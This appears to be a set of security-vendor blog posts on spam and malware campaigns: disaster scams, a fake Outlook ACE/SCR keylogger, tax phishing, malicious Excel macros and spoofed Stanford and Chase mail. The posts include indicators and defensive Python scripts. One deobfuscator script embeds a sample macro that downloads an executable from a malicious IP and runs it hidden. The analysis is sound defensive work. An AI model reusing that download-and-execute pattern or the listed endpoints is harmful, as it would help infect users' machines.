As most people know by now, a large earthquake struck Nepal a few days ago, causing massive damage and deaths in the thousands. After most large tragic events like this, scammers unfortunately come out of the dark corners of the internet to take advantage of the public's kindness and desire to help. We've seen it many times, and with the Nepal earthquake it's no different.

We've been seeing a slow influx of messages that use the earthquake as an attention-getter for ordinary spam. Diabetes medicine spam, for example, will open with a quick news sentence about the earthquake to catch the reader's attention and then go on to sell whatever the original product was. We've also seen customized 419 scam messages from senders claiming to be victims of the earthquake. The theme is the same as a normal 419, where they want your help moving a large sum of money, but it is built specifically around the recent events in Nepal.

[Screenshot from 2015-04-29 08:53:32]

There have also been emails claiming to be part of relief funds that are simply phishing for responses. Replying to a message like this opens up a can of worms: the attacker can now focus on that user personally and work on convincing them to send money somewhere. After a large disaster they may lean on guilt to pressure the user into sending money, which can be a very effective method.

[Screenshot from 2015-04-29 08:48:51]

There was a small virus campaign as well. It looks like the exe was having some issues, since it seemed to keep crashing shortly after starting. However, I did see some keyboard hooking, so it was most likely a small keylogger that would record keystrokes and send them off to a remote server.

[Screenshot from 2015-04-29 08:56:27]


It's always unfortunate to see spam and virus campaigns built around exploiting people's goodwill and their desire to help. We always see these things after world-news-worthy events, and we will probably continue to. That doesn't mean users should ignore every email asking for support, since legitimate companies and organizations will be seeking donations too. But users should be wary of emails tied to recent events, since those will be a major theme in campaigns over the coming weeks. Researching a charity before giving, dealing with known organizations through their own public websites rather than through links in email, and avoiding unknown or unexpected attachments are good steps to make sure you aren't getting scammed or running a virus.

Yesterday we began seeing a malware campaign posing as a message from "Microsoft Outlook". The messages notify the user that they have exceeded their mailbox storage limit and advise them to open the attachment to upgrade their account. The attachment is an ACE (.ace) archive containing a malicious SCR (.scr) file. ACE is a compressed archive format similar to the more common ZIP or RAR; although it is used far less often than those, unpacking ACE files is supported by many third-party archivers, so the unusual format is no barrier to the user opening it. The SCR file inside is rather large (643 KB); the attachment itself is named updatemail(dot)ace.

[Screenshot of the fake Microsoft Outlook notification]

While the majority of malware hitting our filters each day is a small Trojan 'dropper' that pulls additional malicious software down from the internet, this sample contains all of the functionality it needs in the attached file itself. In other words, it does not have to download anything else to do its damage. Once executed, the malware drops a file in AppData and adds a Run registry key so that it starts again at every logon. It immediately registers a hook to monitor keyboard input (keylogging) and sets up a listener on TCP port 49202. We also observed the malware attempting to harvest any bitcoin stored on the user's system, and it has a self-propagation capability via SMTP, so we can likely expect to see more of these in the future.

File name: Updatemail(dot)ace
MD5: 7e46f98e98eb39d13ddfaa66551181b7
SHA1: 6baeced8fdf6c93a024167fb961e5037b59e5006
SHA256: eb97f6d0a454e0034e06d16e69ab6dddbf9d3d8e790e66003d6b3cfebd9d29e7
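The hashes above and the ACE-wrapping-an-SCR pattern are the two things a mail gateway can act on before a user ever sees the attachment. The following is an added example of that triage logic, written for this post; it is not code from the original article or from any vendor product. It matches the three published hashes, recognizes an ACE archive by its magic bytes regardless of extension, and flags executable member names. The "member_names" argument and the SAMPLE_ACE bytes are assumptions constructed for the example (only the magic is real; it is not the Updatemail.ace sample).

```python
import hashlib
import os

# Indicators published above for the Updatemail.ace sample.
KNOWN_BAD_HASHES = {
    "7e46f98e98eb39d13ddfaa66551181b7",                                   # MD5
    "6baeced8fdf6c93a024167fb961e5037b59e5006",                           # SHA1
    "eb97f6d0a454e0034e06d16e69ab6dddbf9d3d8e790e66003d6b3cfebd9d29e7",   # SHA256
}

# Extensions Windows runs on double-click. A .scr is an ordinary PE
# executable despite the "screensaver" name.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}

# An ACE archive carries the literal "**ACE**" at offset 7 of its main
# header, whatever extension the sender gave the file.
ACE_MAGIC_OFFSET = 7
ACE_MAGIC = b"**ACE**"


def digests(data: bytes) -> dict:
    """MD5, SHA1 and SHA256 of an attachment body, as lowercase hex."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def is_ace_archive(data: bytes) -> bool:
    end = ACE_MAGIC_OFFSET + len(ACE_MAGIC)
    return len(data) >= end and data[ACE_MAGIC_OFFSET:end] == ACE_MAGIC


def triage_attachment(filename: str, data: bytes, member_names=(),
                      known_bad=KNOWN_BAD_HASHES) -> dict:
    """Decide whether one attachment should be blocked.

    member_names: file names inside the archive, if the gateway already
    expanded it (hypothetical: supplied by whatever unpacker you run).
    """
    reasons = []
    hashes = digests(data)
    if known_bad & set(hashes.values()):
        reasons.append("hash matches a published indicator")
    if is_ace_archive(data):
        reasons.append("ACE archive, a format rarely seen in legitimate mail")
    ext = os.path.splitext(filename)[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    for name in member_names:
        if os.path.splitext(name)[1].lower() in EXECUTABLE_EXTENSIONS:
            reasons.append(f"archive member {name} is executable")
    return {
        "filename": filename,
        "sha256": hashes["sha256"],
        "block": bool(reasons),
        "reasons": reasons,
    }


# Constructed stand-in for an ACE attachment: only the magic is real, the
# rest is padding. It is not the sample from the post.
SAMPLE_ACE = b"\x00" * ACE_MAGIC_OFFSET + ACE_MAGIC + b"\x00" * 40


if __name__ == "__main__":
    verdict = triage_attachment("updatemail.ace", SAMPLE_ACE,
                                member_names=["updatemail.scr"])
    print(verdict["block"], verdict["reasons"])
```

Hash matching only catches this exact build, and the group will recompile. The format and extension checks are what keep working on the next variant, which is why the verdict is built from several independent reasons rather than from the hash alone.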

When W-2s started arriving earlier in the year, we saw an increase in tax-related spam attempting to phish users for sensitive data or infect their PCs outright. It's no surprise, then, that 2015 has been quite a busy year for tax scams of all sorts.

Early in the year, Intuit (the company behind the very popular tax software/service TurboTax) announced that it was temporarily shutting down state tax filing because of a rash of "suspicious" filings. The news came at a time when millions of US citizens were filing federal and state returns, and it resulted in a partial (albeit temporary) outage for the most widely used online tax preparation provider in the US. The shutdown came on the heels of Minnesota's decision to stop accepting filings from TurboTax because of potential fraudulent activity. A full investigation is still pending, but Intuit's initial response was that the false filings were not the result of a breach of its internal network and occurred by some other means. It stands to reason that the perpetrators may have used username/password combinations stolen in any of the many recent breaches, since people reuse the same credentials across multiple accounts. Or perhaps they were harvested through one of the many tax-themed phishing campaigns we see hitting our spam filter every day.

We have seen hundreds of variants of tax-themed email campaigns attempting to dupe users in the first quarter of 2015. The majority of the messages carry malware as an attachment or use a URL that leads to a malicious payload.

More and more users are filing their taxes electronically, and to an unsuspecting user an email such as the one pictured below may look legitimate.

[Screenshot of the fake IRS tax-document email]

This particular variant is quite simple: it instructs the user to follow a link to view a message from the IRS regarding their tax documents. To the average user these messages look exactly like what a tax-document email from the IRS should look like. The only problem is that the IRS "does not initiate taxpayer communications through e-mail and won't send a message about your tax account". As is customary in these types of messages, the URL leads to either a malware infection or a phishing landing page.

So, what can you do to stay safe this tax season?

  • Keep your browser and operating system up to date. Both receive frequent updates, many of which fix vulnerabilities that could be used in an attack against an innocent taxpayer.
  • Online fraudsters (a.k.a. "phishers") will try to contact taxpayers by email. Remember: the IRS will never initiate contact with a taxpayer through email.
  • The IRS will never ask you for PINs or credit card information in an email.
  • Never click on a link or open an attachment from an unsolicited email.
  • Never conduct unsecured transactions that involve account or password information over public hotspots such as airports, hotels, libraries, restaurants, cafes, or other locations that offer free WiFi.
  • Always log out of sensitive sites completely. An attacker can hijack a session that has been left open.
  • Do not file online using the same computer your kids use. A good portion of online scams and spam target today's younger generation of Internet users.
  • Remain vigilant and use simple logic: if it seems too good to be true and it is sitting in your inbox, delete it, especially if it comes from someone you did not contact first.
  • Before entering sensitive information into a website, look for the padlock symbol and check that the address is the one you expect. The padlock only means the connection is encrypted; a phishing site can have one too.
  • Create strong passwords and use a different one for every site: complex combinations of upper and lower case letters, numbers and symbols, never reused between accounts.
  • Limit your exposure through email and the web. It is online behavior that bears the most scrutiny, and a reliable email and web filtering solution is essential to mitigating the risk.

[Screenshot of one of the Remittance Advice emails]

In what appears to be more work from the same people behind Jon French's blog post last week, we began seeing a blast of malicious spreadsheets pouring into our filters this morning. The emails carrying them had some minor randomness in their subject lines, but all contained the phrase "Remittance Advice for" followed by a random decimal number and a random company name such as JP Morgan or Powerchip Technology. The bodies simply restated the random company name from the subject line along with the spoofed sender name. The attachment was a seemingly blank .xls document. Under the hood, however, was a malicious VBA macro that attempts to download an executable masquerading as a .gif file from a remote server. The macro uses some minor obfuscation, building its strings from ASCII integer values instead of readable text, to hide its intent.

[Screenshot of the obfuscated macro] After a quick conversion, we can see that this script is attempting to download the file ddls.gif from the IP 91.215.138.84, which is located in Moscow, Russia.
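The "quick conversion" above is mechanical, and it is worth automating because this group changes the host far more often than the trick. What follows is an added example written for this post, not the macro itself or any vendor tool: it walks a macro source line by line, turns Chr()/ChrW()/Chr$() calls and quoted literals back into strings, lets later assignments reference earlier variables, and pulls out any URLs. The SAMPLE_MACRO is constructed in the style described above; the host and the file name ddls.gif come from the post, while the path "/ddls.gif", the variable names and the download/launch calls are assumptions. Function calls such as Environ() are not evaluated, only their string arguments are kept, which is enough to recover the indicator.

```python
import re

# Tokens of a VBA string expression: Chr()/ChrW()/Chr$() with a numeric
# code, a quoted literal ("" inside is an escaped quote), or a bare
# identifier referring to an earlier variable. Everything else (the '&'
# operators, parentheses, commas) is skipped.
TOKEN = re.compile(r'Chr[W$]?\s*\(\s*(\d+)\s*\)|"((?:[^"]|"")*)"|([A-Za-z_]\w*)')

# "name = expression" assignment lines, with an optional leading Set.
ASSIGN = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')

URL = re.compile(r'https?://[^\s"\'<>()]+')


def decode_expression(expr: str, env: dict) -> str:
    """Concatenate the decoded tokens of one string expression.

    Only Chr() with a numeric literal is resolved; identifiers that are not
    known variables (function names, vbCrLf, ...) decode to the empty string.
    """
    out = []
    for code, literal, ident in TOKEN.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif ident:
            out.append(env.get(ident, ""))
        else:
            out.append(literal.replace('""', '"'))
    return "".join(out)


def decode_macro(src: str) -> dict:
    """Decode every assignment in order, so later lines can reuse earlier ones."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.groups()
        env[name] = decode_expression(expr, env)
    return env


def extract_urls(src: str) -> list:
    """Every URL found in a decoded string, in order of first appearance."""
    seen = []
    for value in decode_macro(src).values():
        for url in URL.findall(value):
            if url not in seen:
                seen.append(url)
    return seen


def obfuscate(text: str) -> str:
    """Produce the Chr()-chained form the macro author used (for the sample)."""
    return " & ".join(f"Chr({ord(c)})" for c in text)


# Constructed macro in the style described in the post; the "/ddls.gif" path,
# the variable names and the surrounding calls are assumptions.
SAMPLE_MACRO = f"""Sub Workbook_Open()
    Dim strURL As String, strFile As String
    strURL = {obfuscate("http://91.215.138.84/ddls.gif")}
    strFile = Environ("TEMP") & Chr(92) & "ddls.exe"
    Call URLDownloadToFile(0, strURL, strFile, 0, 0)
    Shell strFile, vbHide
End Sub
"""


if __name__ == "__main__":
    for name, value in decode_macro(SAMPLE_MACRO).items():
        print(f"{name} = {value!r}")
    print("URLs:", extract_urls(SAMPLE_MACRO))
```

In practice olevba from the oletools package performs this decoding (and much more) straight from the .xls file; the point of the hand-rolled version is to show that the obfuscation is nothing more than a substitution table, so it should never be the reason a sample scores 0 detections.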

[Screenshot of the decoded macro] Even though the server at this IP is up and responding, it is no longer fulfilling requests for this file, so I can't say for certain what its intentions were, but you can likely bet on a keylogger in there somewhere, in addition to the usual other things.

At the time of analysis these .xls files scored a whopping 0/57 on VirusTotal, meaning none of the AV engines recognized them as malicious. It's unclear how long the file was able to reach the remote server to download the main payload (ddls.gif), if it ever did, but it didn't appear to be very long.

Emails purporting to come from Stanford Health Care deliver malware inside an attachment entitled Customer_department_offer.zip. The emails use one of six subject lines in their attempt to trick recipients into falling prey to the campaign: "Special offer", "Health Care", "Thank You", "Important", "check out", and my favorite, "Stanford Medecine" [sic]. I enjoy the fact that this subject line misspells the word "medicine", especially considering the proper spelling is right there in the graphic they used to spoof Stanford in the first place, but I digress.
[Screenshot of the fake Stanford Health Care email]

This campaign is directly related to similar campaigns we have been seeing on a daily basis. They usually begin in the morning as people in the US are getting into work, around 6 a.m. CST, and last for just over an hour, delivering right around 1 million messages. The functionality in these campaigns is the same, as is the fake PDF icon on the zipped-up executable. The main differences between them are the entity they choose to spoof and the contact domains and IPs the malware reaches out to. This particular campaign reaches out to the domain estelareventos.com as well as an IP in Ukraine, 141.105.141.87, on port 13912.

This just in: as I was writing this post the same group began sending yet another campaign, this time impersonating Chase Bank, which they have been keen to do. This time the malware attempts to connect to sncielles.de, restaurantesdeasturias.com, and 141.105.141.87 again, now on port 13923.

[Screenshot of the fake Chase email]
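Because the same server reappears across campaigns with only the port changing, the useful hunt is over outbound connection logs rather than over the attachment. The following is an added example written for this post, not code from the original article: it takes the contact domains and IP:port pairs from the Stanford and Chase campaigns above and runs them over a few log lines. The log format and every line in SAMPLE_LOG are constructed for the example (the internal addresses, timestamps and the cdn.sncielles.de subdomain are all made up); a known IP on an unlisted port is reported at lower confidence instead of being ignored, since that is exactly how the port rotation between the two campaigns would show up.

```python
import re

# Contact indicators from the two campaigns described above.
KNOWN_C2_DOMAINS = {"estelareventos.com", "sncielles.de", "restaurantesdeasturias.com"}
KNOWN_C2_ENDPOINTS = {("141.105.141.87", 13912), ("141.105.141.87", 13923)}
KNOWN_C2_IPS = {ip for ip, _ in KNOWN_C2_ENDPOINTS}

# One key=value record per line. The format and every line are constructed
# for this example; they are not real proxy or firewall logs.
SAMPLE_LOG = """\
2015-04-30T06:12:03Z proxy src=10.1.4.22 dst=estelareventos.com dport=80 action=allow
2015-04-30T06:12:09Z fw src=10.1.4.22 dst=141.105.141.87 dport=13912 action=allow
2015-04-30T06:13:40Z proxy src=10.1.7.9 dst=intranet.example.com dport=443 action=allow
2015-04-30T07:02:11Z fw src=10.1.9.14 dst=141.105.141.87 dport=13923 action=allow
2015-04-30T07:05:00Z proxy src=10.1.9.14 dst=cdn.sncielles.de dport=80 action=allow
2015-04-30T07:09:31Z fw src=10.1.2.2 dst=141.105.141.87 dport=443 action=deny
"""

RECORD = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
)


def domain_matches(host: str, bad_domains) -> bool:
    """Exact or subdomain match, so cdn.sncielles.de hits sncielles.de."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def classify(line: str):
    """Return (severity, reason) for a log line, or None if it is clean."""
    m = RECORD.match(line)
    if not m:
        return None
    dst, dport = m["dst"], int(m["dport"])
    if (dst, dport) in KNOWN_C2_ENDPOINTS:
        return "high", f"{dst}:{dport} is a known C2 endpoint"
    if dst in KNOWN_C2_IPS:
        # Same server, port not on the list: this group rotates ports per campaign.
        return "medium", f"{dst} is a known C2 IP on an unlisted port {dport}"
    if domain_matches(dst, KNOWN_C2_DOMAINS):
        return "high", f"{dst} is a known contact domain"
    return None


def scan(log: str) -> list:
    """All matching lines, with the internal source so the host can be found."""
    hits = []
    for line in log.splitlines():
        verdict = classify(line)
        if verdict:
            m = RECORD.match(line)
            hits.append({"ts": m["ts"], "src": m["src"],
                         "severity": verdict[0], "reason": verdict[1]})
    return hits


def hosts_to_isolate(log: str) -> list:
    """Internal sources with at least one high-severity hit, sorted."""
    return sorted({h["src"] for h in scan(log) if h["severity"] == "high"})


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["severity"], hit["reason"])
    print("isolate:", hosts_to_isolate(SAMPLE_LOG))
```

A denied connection still earns a hit: the firewall stopped the callback, but the host that tried it has already run the attachment, and the next campaign will use a port the rule set has not seen.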